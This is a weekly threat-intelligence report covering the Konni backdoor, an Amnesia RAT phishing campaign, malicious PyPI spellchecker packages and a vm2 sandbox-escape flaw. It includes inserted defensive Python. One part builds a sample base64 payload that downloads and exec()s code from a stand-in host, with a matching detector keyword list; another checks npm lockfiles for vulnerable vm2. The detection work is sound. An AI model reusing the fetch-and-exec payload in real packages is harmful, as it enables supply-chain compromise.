DigiCert’s Open-Source Intelligence (OSINT) Report – January 23 – January 29, 2026


Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.

NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.

Konni Hackers Deploy AI-Generated PowerShell Backdoor Against Blockchain Developers

(TLP: CLEAR) North Korean advanced persistent threat (APT) group Konni (also tracked as Opal Sleet/TA406) has been observed conducting a new phishing campaign that leverages AI-generated PowerShell backdoor malware to compromise software developers and engineering teams in the blockchain and crypto sector, expanding its targeting footprint beyond traditional regions such as South Korea, Russia, Ukraine, and Europe into Japan, Australia, and India. According to a Check Point Research technical report, the campaign uses social engineering lures often delivered via spear-phishing emails or Discord links that present seemingly legitimate documents and entice victims to download malicious archives. These archives contain crafted components, including a Windows shortcut (LNK) that triggers a PowerShell loader to extract additional payloads (e.g., a backdoor, batch scripts, and a UAC bypass executable) and establish persistence by creating scheduled tasks.

(TLP: CLEAR) Comments: The embedded PowerShell backdoor exhibits features suggesting it was generated with assistance from AI tools, such as structured modular code and detailed documentation comments, which may streamline development and obfuscation. Once deployed, the backdoor performs anti-analysis checks, establishes persistence, and connects to command-and-control (C2) infrastructure to enable further exploitation of development environments, potentially exposing sensitive assets, credentials, and crypto infrastructure.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “A core capability of PDNS is the ability to categorize domain names based on threat intelligence. PDNS services typically leverage open source, commercial, and governmental information feeds of known malicious domains. These feeds enable coverage of domain names found at numerous points of the network exploitation lifecycle. Some solutions may also detect novel malicious domains based on pattern recognition. The types of domains typically addressed by a PDNS system include the following:

  • Malware distribution and command and control: Sites known to serve malicious content or used by threat actors to command-and-control malware. For example, these may include sites hosting malicious JavaScript® files or domains that host advertisements that collect information for undesired profiling. PDNS can block and alert on known malicious connection attempts.”

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using four distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine whether a domain is malicious before endpoints can be infected by it.

Source: https://thehackernews.com/2026/01/konni-hackers-deploy-ai-generated.html 

Multi-Stage Phishing Campaign Targets Russia with Amnesia RAT and Ransomware

(TLP: CLEAR) Researchers have identified a sophisticated multi-stage phishing campaign actively targeting users in Russia, which leverages social engineering and chained payload delivery to compromise systems with a remote access Trojan (Amnesia RAT) and ransomware. The attack begins with phishing lures distributed as business-themed documents inside compressed archives; these include Windows shortcut (LNK) files with double extensions designed to appear as innocuous text files. When opened, the LNK triggers a PowerShell script that silently executes and retrieves a first-stage loader from a public GitHub repository, hides execution traces, and displays decoy content to delay user suspicion. Subsequent scripts, including a highly obfuscated Visual Basic Script, run in memory to avoid disk artifacts, escalate privileges through repeated User Account Control (UAC) prompts, and then execute multiple preparatory actions: disabling and bypassing Microsoft Defender protections, configuring exclusions, conducting reconnaissance, and suppressing visibility. The final delivery includes the Amnesia RAT, capable of full remote control, credential theft, and data exfiltration, and a ransomware payload from the Hakuna Matata family that encrypts user files while evading recovery tools.

(TLP: CLEAR) Comments: The campaign highlights abuse of public cloud services (e.g., GitHub for scripts, Dropbox for binaries), layered scripting to evade defenses, and use of native Windows features to disable endpoint protections and achieve persistence, exemplifying how modern phishing attacks can achieve deep compromise without exploiting software vulnerabilities.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “A core capability of PDNS is the ability to categorize domain names based on threat intelligence. PDNS services typically leverage open source, commercial, and governmental information feeds of known malicious domains. These feeds enable coverage of domain names found at numerous points of the network exploitation lifecycle. Some solutions may also detect novel malicious domains based on pattern recognition. The types of domains typically addressed by a PDNS system include the following:

  • Phishing: Sites known to host applications that maliciously collect personal or organizational information, including credential harvesting scams. These domains may include typo-squats – or close lookalikes of common domains. PDNS can protect users from accidentally connecting to a potentially malicious link.”

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.

Source: https://thehackernews.com/2026/01/multi-stage-phishing-campaign-targets.html 

Fake Python Spellchecker Packages on PyPI Delivered Hidden Remote Access Trojan

(TLP: CLEAR) Cybersecurity researchers have uncovered malicious Python packages on the Python Package Index (PyPI)—specifically spellcheckerpy and spellcheckpy—that masqueraded as innocuous spell-checking libraries but, in reality, delivered a remote access Trojan (RAT) to systems that installed them. These packages were collectively downloaded more than a thousand times before removal and were crafted to hide malicious functionality within what appeared to be legitimate Basque language dictionary files; the payload was base64-encoded inside the dictionary data rather than in typical script entry points, helping evade casual detection.

(TLP: CLEAR) Comments: Early versions contained the payload but lacked an execution trigger; with the release of spellcheckpy v1.2.0, the attacker added an obfuscated trigger that automatically executes the downloader when the package is imported, initiating retrieval of a Python RAT from an external domain. The first-stage downloader can fingerprint the host, parse commands, and execute remote instructions, effectively giving attackers persistent remote control over compromised machines. The campaign underscores increasing software supply chain risks, where malicious packages with deceptive names and hidden execution logic infiltrate widely used repositories to gain execution in developer and production environments.
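As an added example (not code from the researchers' report or from the page), a Python check for the two tricks described above: a base64-encoded payload hidden inside a package data file, and an exec/eval call that runs as a side effect of import. The dictionary file, the __init__ source and the file name eu_words.txt are constructed stand-ins, not values from the report.

```python
import ast
import base64
import binascii
import re

# Constructed "dictionary" data file: short word entries with a base64 blob hidden among them.
_PAYLOAD = b"import urllib.request, subprocess\nexec(urllib.request.urlopen('http://example.invalid/x').read())"
SAMPLE_DICT = "\n".join(["etxe", "kale", "ur", "mendi",
                         base64.b64encode(_PAYLOAD).decode(), "zuhaitz", "egun"])

# Constructed __init__.py that decodes one dictionary line and exec()s it at import time.
SAMPLE_INIT = '''
import base64, pkgutil
_data = pkgutil.get_data(__name__, "eu_words.txt")
exec(base64.b64decode(_data.splitlines()[4]))
def check(word):
    return word in _data
'''

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # real dictionary words are far shorter
SUSPICIOUS = ("exec(", "eval(", "__import__", "subprocess", "urllib", "socket")

def find_hidden_payloads(text):
    """Base64 runs in a data file that decode to text containing code-like tokens."""
    findings = []
    for m in B64_RUN.finditer(text):
        blob = m.group(0)
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue          # not valid base64, or decodes to non-text: skip
        hits = [t for t in SUSPICIOUS if t in decoded]
        if hits:
            findings.append((blob, decoded, hits))
    return findings

def import_time_exec_calls(source):
    """Names of exec/eval/__import__ calls in statements that run when the module is imported.
    Bodies of top-level def/class are skipped: code there only runs when something calls it."""
    tree = ast.parse(source)
    hits = []
    for stmt in tree.body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        for node in ast.walk(stmt):
            if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                    and node.func.id in ("exec", "eval", "__import__")):
                hits.append(node.func.id)
    return hits
```

Run both checks over every file in an extracted wheel or sdist before it reaches a build host; a data file that decodes to code plus an import-time exec is the combination the page describes.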

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy that blocks typical software download sites, in addition to hacker tools and P2P services, organizations reduce the number of malware infections and Trojan horses that their users unknowingly introduce into the organization. This can be done via a protective DNS or forward web proxy solution with website category feeds.

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in real time and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.

Source: https://thehackernews.com/2026/01/fake-python-spellchecker-packages-on.html 

Critical vm2 Node.js Flaw Allows Sandbox Escape and Arbitrary Code Execution

(TLP: CLEAR) A critical sandbox escape vulnerability has been disclosed in the widely used vm2 Node.js library, tracked as CVE-2026-22709 with a CVSS severity of 9.8/10, that enables an attacker to break out of the sandbox and achieve arbitrary code execution on the host system. vm2 is intended to safely run untrusted JavaScript by proxying objects and sanitizing callback functions, but the flaw lies in its incomplete sanitization of Promise handlers: while the library sanitizes callbacks on its own internal (localPromise) Promise prototype, it fails to sanitize the global Promise prototype (globalPromise.prototype.then and .catch) used by native async functions. Since JavaScript async functions return global promises, malicious code executed within the sandbox can attach unsanitized then/catch callbacks, exploit this oversight, and escape isolation to execute arbitrary host-level operations. 

(TLP: CLEAR) Comments: This issue affects vm2 versions up to 3.10.0 and has been addressed in version 3.10.2 (and later 3.10.3); users are strongly advised to update immediately. The disclosure underscores vm2’s history of sandbox escape issues and the inherent risks of relying on its JavaScript-level isolation, with maintainers recommending stronger alternatives (e.g., isolated-vm or container-based isolation) for robust security.
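As an added example that is not part of the original report, a Python script that walks an npm package-lock.json (lockfile versions 1 and 2/3) for every copy of vm2, including copies nested under other dependencies, and flags any version below the first fixed release 3.10.2 named above. The lockfile contents and the package names in it are constructed.

```python
import json

FIXED = (3, 10, 2)   # first fixed release per the summary above; 3.10.3 is also fixed

# Constructed package-lock.json (lockfileVersion 3): one vulnerable copy of vm2 is
# nested under a plugin while a patched copy sits at the top level.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"some-plugin": "^1.0.0"}},
        "node_modules/some-plugin": {"version": "1.4.0", "dependencies": {"vm2": "^3.9.0"}},
        "node_modules/some-plugin/node_modules/vm2": {"version": "3.9.19"},
        "node_modules/vm2": {"version": "3.10.3"},
    },
})

def parse_semver(version):
    """'3.10.2' -> (3, 10, 2); pre-release and build metadata are dropped."""
    core = version.split("-", 1)[0].split("+", 1)[0]
    return tuple(int(part) for part in core.split("."))

def find_vm2(lock_text):
    """All (install path, version) pairs for vm2, including nested copies."""
    lock = json.loads(lock_text)
    found = []
    if "packages" in lock:                      # lockfileVersion 2 and 3
        for path, meta in lock["packages"].items():
            if path.endswith("node_modules/vm2") and "version" in meta:
                found.append((path, meta["version"]))
    else:                                       # lockfileVersion 1: nested "dependencies"
        def walk(deps, prefix):
            for name, meta in deps.items():
                path = f"{prefix}node_modules/{name}"
                if name == "vm2" and "version" in meta:
                    found.append((path, meta["version"]))
                walk(meta.get("dependencies", {}), path + "/")
        walk(lock.get("dependencies", {}), "")
    return found

def vulnerable_vm2(lock_text):
    """vm2 copies below the first fixed release; each needs an upgrade or removal."""
    return [(p, v) for p, v in find_vm2(lock_text) if parse_semver(v) < FIXED]

if __name__ == "__main__":
    for path, version in vulnerable_vm2(SAMPLE_LOCK):
        print(f"{path}: vm2 {version} is below {'.'.join(map(str, FIXED))}")
```

A top-level vm2 at 3.10.3 does not help when a dependency pins its own older copy; the nested path is the one to chase.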

(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION 

Control: 

  • Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code. 
  • Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures. 
  • Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection.
  • Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.”

NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defense-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client.

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters DNS responses for both users and machines, using defined categories, including botnet Command and Control (C2), together with machine learning that detects previously uncategorized malicious associations, to help prevent data exfiltration or malware detonation.

Source: https://thehackernews.com/2026/01/critical-vm2-nodejs-flaw-allows-sandbox.html 

Traffic Light Protocol (TLP)

Except where noted, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.

About Vercara

The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.

To learn more about Vercara solutions, please contact us.